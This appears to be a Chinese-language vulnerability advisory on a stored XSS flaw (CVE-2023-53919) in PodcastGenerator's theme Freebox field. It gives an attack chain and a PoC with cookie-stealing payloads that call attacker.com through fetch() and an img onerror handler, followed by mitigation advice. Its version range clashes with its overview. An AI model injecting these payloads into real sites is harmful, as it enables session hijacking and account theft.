CVE-2023-53919 PodcastGenerator 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2023-53919

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PodcastGenerator

漏洞概述

PodcastGenerator 3.2.9版本中存在一处存储型跨站脚本攻击（Stored XSS）漏洞。该漏洞位于主题自定义界面的Freebox内容字段中，具体文件为theme_freebox.php。攻击者可以通过该字段注入恶意JavaScript代码，这些恶意代码会被永久存储在服务器端。当其他用户访问应用程序的首页时，存储的恶意脚本会自动执行，从而窃取用户会话Cookie、劫持用户账户、执行未经授权的操作或进行钓鱼攻击。由于该漏洞影响的是所有访问首页的用户，因此具有广泛的传播性和较高的危害性。攻击者无需高级权限即可利用此漏洞，但需要具备应用程序的基本访问权限。漏洞的CVSS评分为5.4，属于中等严重程度，主要因为其需要用户交互才能触发攻击。

技术细节

该漏洞的根本原因在于theme_freebox.php文件对用户输入的Freebox内容字段缺乏充分的输入验证和输出编码。在PodcastGenerator的主题定制功能中，管理员可以自定义Freebox的内容以增强播客网站的外观。然而，系统未对用户提交的HTML/JavaScript内容进行安全过滤，直接将未经处理的输入存储到数据库。当其他用户访问首页时，这些恶意内容会从数据库中取出并直接渲染到页面HTML中，导致嵌入的JavaScript代码被执行。攻击者可以利用此漏洞注入诸如<script>alert(document.cookie)</script>等恶意payload。由于是存储型XSS，攻击只需一次注入即可影响所有后续访问者。漏洞的利用需要低权限用户身份（PR:L），攻击向量为网络（AV:N），但需要用户交互（UI:R）才能触发。

攻击链分析

STEP 1

步骤1

攻击者以低权限用户身份登录PodcastGenerator应用程序

STEP 2

步骤2

攻击者访问主题自定义界面（theme_freebox.php）

STEP 3

步骤3

攻击者在Freebox内容字段中注入恶意JavaScript payload，如<script>alert(document.cookie)</script>

STEP 4

步骤4

恶意payload被存储到数据库中，由于缺乏输入验证，代码未经过滤

STEP 5

步骤5

当普通用户访问应用程序首页时，服务器从数据库取出Freebox内容并直接渲染到页面

STEP 6

步骤6

用户浏览器执行嵌入的恶意JavaScript代码，导致Cookie窃取、会话劫持或其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS Payload for CVE-2023-53919 -->
<!-- This PoC demonstrates the stored XSS vulnerability in PodcastGenerator 3.2.9 -->
<!-- Target: theme_freebox.php Freebox content field -->

<!-- Step 1: Inject malicious JavaScript via Freebox content field -->
<!-- The payload will be stored and executed when users visit the homepage -->

<script>
  // Steal user session cookies
  var stolenCookies = document.cookie;
  
  // Send cookies to attacker's server
  fetch('https://attacker.com/steal?c=' + encodeURIComponent(stolenCookies));
  
  // Alternative payload: Session hijacking
  alert('XSS Executed - Session Cookie: ' + document.cookie);
</script>

<!-- Or use img tag for cookie theft (bypasses some filters) -->
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">

<!-- Simple alert proof of concept -->
<script>alert('CVE-2023-53919 Stored XSS')</script>

影响范围

PodcastGenerator < 3.2.9

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制低权限用户访问主题自定义功能；2) 对theme_freebox.php文件进行紧急修补，添加输入验证和输出编码逻辑；3) 部署Web应用防火墙（WAF）规则过滤恶意script标签和JavaScript事件处理器；4) 启用Content-Security-Policy响应头限制脚本执行；5) 监控应用程序日志，及时发现可疑的XSS攻击尝试。